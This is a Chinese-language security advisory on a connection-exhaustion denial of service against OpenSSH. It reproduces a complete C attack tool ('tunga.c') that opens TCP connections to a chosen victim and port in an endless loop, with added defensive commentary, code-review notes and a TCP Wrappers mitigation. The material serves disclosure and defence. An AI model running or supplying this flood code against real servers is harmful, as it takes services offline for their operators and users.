詳細描述
OpenSSH 存在拒絕服務漏洞，使用如下操作：
$ ssh user@somehost.com
ssh_exchange_identification: Connection closed by remote host
可以導致服務停止。
測試代碼--[ Code ]--
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
int main (int argc, char *argv[]) {
  /*
   * Proof-of-concept quoted by the advisory above: connects to
   * <victim>:<port> in an endless loop and never closes the sockets it
   * opens, so the target accumulates idle TCP connections until it
   * starts refusing new ones (the "ssh_exchange_identification:
   * Connection closed by remote host" symptom shown above).
   *
   * Defender's reading: the exposure is unauthenticated connection
   * exhaustion.  The advisory's own mitigation is source-address control
   * via libwrap / hosts.{allow,deny}; sshd's MaxStartups setting is the
   * usual limit on concurrent unauthenticated connections for this class
   * of problem (not covered by this page -- confirm for your version).
   * A burst of connects from one source that never completes the SSH
   * banner exchange is the pattern to alert on.
   *
   * Review notes on the code as written:
   *  - memcpy() needs <string.h>; exit() and atoi() need <stdlib.h>.
   *    Neither header is included, so these rely on implicit declarations.
   *  - servAddr is never zero-initialized (sin_zero stays indeterminate).
   *  - atoi() does no validation of the <port> argument.
   *  - gethostbyname() is IPv4-only and obsolete (getaddrinfo() replaces it).
   */
  int sd, rc;
  struct sockaddr_in localAddr, servAddr;   /* localAddr is declared but never used */
  struct linger ling;                       /* declared but never used */
  struct hostent *h;
  /* Usage banner: requires exactly <victim> and <port>. */
  if(argc < 3) {
    printf("tunga.c - OpenSSH DoS Attack\n");
    printf("by DrBrain <drbrain@phibernet.org>\n");
    printf("Phibernet Information Network <http://www.phibernet.org>\n\n");
    printf("Usage: %s <victim> <port>\n\n",argv[0]);
    exit(1);
  }
  /* Resolve the target; only the first returned address is used below. */
  h = gethostbyname(argv[1]);
  if(h==NULL) {
    printf("%s: Unknown Host '%s'\n",argv[0],argv[1]);
    exit(1);
  }
  /*
   * Unbounded loop: every iteration creates a fresh socket and connects.
   * No close() ever happens, so descriptors pile up on both ends.  The
   * loop only terminates through the exit(1) calls below, when socket()
   * or connect() fails (e.g. the local descriptor limit is hit or the
   * peer stops accepting); the exit(0) after the loop is unreachable.
   */
  for(;;) {
    servAddr.sin_family = h->h_addrtype;
    /* Copy the first resolved address; h_length bytes, no bound check
     * against sizeof servAddr.sin_addr. */
    memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0],
h->h_length);
    servAddr.sin_port = htons(atoi(argv[2]));
    sd = socket(AF_INET, SOCK_STREAM, 0);
    if(sd<0) {
      perror("Cannot Open Socket ");
      exit(1);
    }
    rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
    if(rc<0) {
      perror("Cannot Connect ");
      exit(1);
    }
  }
  exit(0);   /* never reached: the loop above has no normal exit */
}
解決方案：編譯 SSH 服務程序以支持 libwrap（TCP Wrappers），然後在 /etc/hosts.{allow,deny} 中增加對來源地址的控制。